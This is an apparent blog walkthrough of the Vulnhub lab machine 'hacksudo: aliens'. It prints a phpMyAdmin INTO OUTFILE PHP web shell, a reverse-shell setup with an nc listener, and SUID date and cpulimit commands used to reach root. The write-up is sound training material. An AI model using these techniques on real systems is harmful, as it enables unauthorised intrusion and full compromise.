Vulnhub Walkthrough: hacksudo: aliens

Nitunga Baptiste Billy
5 min readSep 28, 2024


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Author: billythegoat-1

Difficulty: easy..ish

Designer: Vishal Waghmare

👽 Estimados lectores, welcome! In this walkthrough, we’ll dive into the Aliens vulnerable machine by Hacksudo. This is my 4th write-up on a Hacksudo machine (maybe it’s time to try something new😅), but there’s something I love about the Hacksudo series — it’s perfect for beginners like me to grasp different vulnerability concepts easily.

Without further ado, let’s jump into the machine and start cracking! 🎯 Enjoy the journey! …Lessgoo!! 🚀🔥👾

Step 1: Information gathering

Let’s kick off by scanning our internal network to get the target ip using netdiscover.

netdiscover -r

ip address:

I went on and fired up nmap and gobuster to see what ports are open, and possible directories listing.

nmap -sC -sV
nmap output

As you can see we have to http ports open. 80 and 9000. Let’s start with directory listing on port 80 and see if there is anything interesting there.

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
gobuster output

Let’s examine the page’s source code to check for any comments that might contain hidden information. Nothing there. Except a fun game in the /game.html directory.


However, an interesting file is in the directory

Cat that out and you get some credentials


These credentials will hopefully be of help after on.

Getting on with the enumeration of the port 9000 with gobuster

gobuster(port 9000)

We get a phpadmin login page

Step 2: Foothold

Using the credentials early on, we are able to login as vishal.

I did some research on how to get a shell from The phpmyAdmin and stumbled upon this article.

Step3: Gaining Access

Using the following command:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/cmd.php'

This code basically puts a minimalist command prompt into a file called cmd.php in the /var/www/html/ directory.

Now, we head to port 80 and execute pwd to see if the cmd is working

Seems like it is working fine. Let’s try and get a persistent php reverse shell.

I used the pentestmonkey php reverse shell for this machine. Creating a php file and pasting in the code. I then fired up a quick and simple python server to host the reverse shell(shell.php).

python -m http.server 80

The command to get the reverse shell would be:

But first, we must encode “wget” into a url form using online url encoding.

After downloading the shell.php file, we now run our netcat listener:

nc -lvnp 9001

And fire up the shell.php by :

I immediately set the environment after getting a shell using:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

I try to see if there is any binaries with the SUID bit set using

find / -perm -4000 -type f 2>/dev/null

At the end of the listing, we see an unsual binary. date
After checking on gtfobins, date can be used to escalate privilegies using:

./date -f $LFILE

I prefered putting it in a script and run it from there

run ./

Step 3: Privilege Escalation 1

We can see the user hacksudo’s hashed password. Let’s use hashcat to crack using the following command:

hashcat -m 1800 -a 0 hash.txt rockyou.txt

we get the following password: aliens

Let’s ssh into the machine to get access to a convenient shell.

We get our user flag in the Desktop in the /home/hacksudo/Desktop/ directory

We, after, try to see if there is any binaries with SUID set that the user hacksudo has access to.

At the very top, we observe the cpulimit binary. A quick look at gtfobins and we get our exploit.

./cpulimit -l 100 -f -- /bin/sh -p

The binary happens to be in the /Download directory.

Step 4: Privilege Escalation 2

Using our exploit from the gtfobins, we get our root shell.


🎉 And there you have it, dear readers! Another banger from the Vishal Waghmare . This machine was a real standout for me, as it was my first time exploiting a vulnerability through phpMyAdmin — a great learning experience! Once I leveraged the phpMyAdmin vulnerability to gain shell access, the rest was relatively straightforward, with familiar SUID binaries to explore.

Thank you for following along on this journey! I hope you enjoyed it as much as I did. Stay tuned for the next walkthrough — I’ll see you there! Cheers! 🍻💻



Nitunga Baptiste Billy
Nitunga Baptiste Billy

Written by Nitunga Baptiste Billy



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